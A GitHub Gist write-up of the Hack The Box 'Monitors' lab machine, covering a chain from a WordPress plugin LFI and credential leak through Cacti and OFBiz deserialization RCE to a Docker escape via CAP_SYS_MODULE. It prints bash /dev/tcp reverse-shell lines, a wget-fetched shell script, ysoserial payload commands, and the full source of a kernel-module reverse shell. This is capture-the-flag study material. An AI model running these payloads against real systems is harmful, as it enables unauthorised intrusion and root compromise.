Skip to content

Instantly share code, notes, and snippets.

@0xEmbo
Created Oct 2, 2021
Embed
What would you like to do?

10.10.10.238

Nmap Scan

nmap -sC -sV -oA monitors 10.10.10.238

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-30 21:36 EET
Nmap scan report for 10.10.10.238
Host is up (0.096s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two open ports: 22 => ssh 80 => http And both services version are not vulnerable to any critical vulnerability, so lets enumerate port 80.

HTTP Enumeration

![[Pasted image 20210930214209.png]] We can't access the site with the IP and it gave us a domain monitors.htb so lets add it to /etc/hosts file and visit it using the domain name. Also whenever you have a domain name, run subdomain bruteforcer maybe you find hidden subdomains. In my case i couldn't find any subdomain.

![[Pasted image 20210930220822.png]] It's a wordpress site and notice the copyright (2018) means it's an old website, we may find a vulnerability in wordpress or any of its plugins.

The first thing i did is i ran wpscan on the site to enumerate wordpress. wpscan --url http://monitors.htb/ --detection-mode aggressive -e at,ap,u

It enumerated wordpress version (5.5.1) and a plugin called wp-with-spritz (1.0) which is vulnerable to LFI.

POC: https://www.exploit-db.com/exploits/44544 ![[Pasted image 20210930221341.png]]

Going to the same path as the exploit says, we were able to read /etc/passwd so we have a LFI vulnerability. ![[Pasted image 20210930221708.png]]

Now lets read apache sites-enabled maybe there is virtual host that we didn't get when we did subdomain bruteforce. Lets use curl because it's much easier to read the output.

![[Pasted image 20210930231754.png]] There is a subdomain cacti-admin.monitors.htb to add to our /etc/hosts, and two conf files to check.

The domain monitors.htb has it's files located in /var/www/wordpress. ![[Pasted image 20210930232517.png]]

And the files of the subdomain cacti-admin.monitors.htb is in /usr/share/cacti. ![[Pasted image 20210930232643.png]]

We may need this information later. Now lets add this subdomain to our hosts file and visit it. ![[Pasted image 20210930232903.png]] This subdomain is running cacti (1.2.12), lets google this version for public exploits.

Cacti is an open-source, web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

I found Authenticated SQL Injection / RCE, but we don't have any credentials yet.

Exploit: https://www.exploit-db.com/exploits/49810

But as you know (or don't know), wordpress has a file called wp-config.php which contains the credentials for the database.

So lets read it with php filter wrapper using the LFI we got before. ![[Pasted image 20210930233759.png]]

Then we need to base64 decode this string. And we have a password BestAdministrator@2020! ![[Pasted image 20210930233848.png]]

Initial Foothold

Lets try to login to cacti. Tried wpadmin:BestAdministrator@2020! and didn't work, but admin:BestAdministrator@2020! worked and logged in successfully. ![[Pasted image 20210930234013.png]]

Now lets use the exploit to get a shell. ![[Pasted image 20211001163842.png]] We have shell as www-data, now lets enumerate the box.

Lateral Movement

While enumerating the box, i found .backup directory in marcus home diirectory but we can't access it.

![[Pasted image 20211001190647.png]]

And after wasting alot of time, i found Cacti Backup Service file that executes /home/marcus/.backup/backup.sh. ![[Pasted image 20211001191411.png]]

And we can read backup.sh although we couldn't list .backup directory. ![[Pasted image 20211001191551.png]] There's config_pass that has the password VerticalEdge2020.

Lets try ssh to user marcus with this password. ![[Pasted image 20211001192000.png]] And we are now user marcus.

Getting root

There's notes.txt file in home directory that saying update docker image for production use. ![[Pasted image 20211001201415.png]]

I don't have permission to use docker command and the docker version doesn't have serios vulnerabilities, so lets look for something else. ![[Pasted image 20211001201635.png]]

![[Pasted image 20211001201732.png]] There is port 8443 running on localhost, lets setup port forwarding so we can connect to it from our machine. ssh -L 127.0.0.1:9001:127.0.0.1:8443 marcus@10.10.10.238 ![[Pasted image 20211001201924.png]]

Now we are forwarding the traffic from our machine on port 9001 to port 8443 on the other machine. Lets visit http://127.0.0.1:9001 ![[Pasted image 20211001202133.png]] It's using https not http, so visit https://127.0.0.1:9001 ![[Pasted image 20211001202231.png]] It's running tomcat 9.0.31, but i couldn't find any helpful vulnerability for this version. I think we should run a directory buster.

gobuster dir -u https://127.0.0.1:9001 -k -w /usr/share/seclist/Discovery/Web-Content/raft-small-words.txt ![[Pasted image 20211001202426.png]]

When i visit most of these directories it forwards me to this login page, which is OFBiz 17.12.01. ![[Pasted image 20211001203046.png]]

I tried default credentials but doesn't work, so i looked for public exploits and found this RCE.

Exploit: https://github.com/g33xter/CVE-2020-9496

Exploitation Steps:

1- Create a bash file that contains a reverse shell.

cat shell.sh
	#!/bin/bash
	/bin/bash -i >& /dev/tcp/10.10.x.x/8001 0>&1

2- Download YsoSerial tool to generate payloads that exploit unsafe Java object deserialization.

Link: https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar

3- Generate payload via ysoserial JAR File

java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"

4- Copy the generated string and run a python webserver. sudo python3 -m http.server 80

5- Use the below curl command to execute our payload.

$ curl https://127.0.0.1:9001/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">PAYLOAD</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

After executing the curl command i got a hit on my python server. Our shell is on the server in /tmp, now we will create another payload to execute our file. ![[Pasted image 20211001210109.png]]

6- Run a netcat listener. nc -nvlp 1337

7- Create another payload to execute the downloaded shell file.

java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"

8- Copy the generated string and paste it inside the curl command.

And we have a root shell but inside a docker container (not on the main host), so we need to escape from the container. ![[Pasted image 20211001210755.png]]

Running capsh --print we have the CAP_SYS_MODULE capability that we can abuse to get a shell on the host machine. We will follow the steps in the following link to get shell on the box.

https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#example-with-environment-docker-breakout-2

First we will create a kernel module that contains our reverse shell. Note that the IP address in the code is the IP of the machine (not ours) because the docker container is not reachable for us. reverse-shell.c

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.10.238/1337 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

Then we will create Makefile to compile it. Makefile

obj-m +=reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
	

Then run make to compite the code. ![[Pasted image 20211001225658.png]]

Finally, run a netcat listener on the host machine (not our machine) and run insmod reverse-shell.ko on the docker shell. ![[Pasted image 20211001225725.png]]

And we are now root on the monitors! ![[Pasted image 20211001225810.png]]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment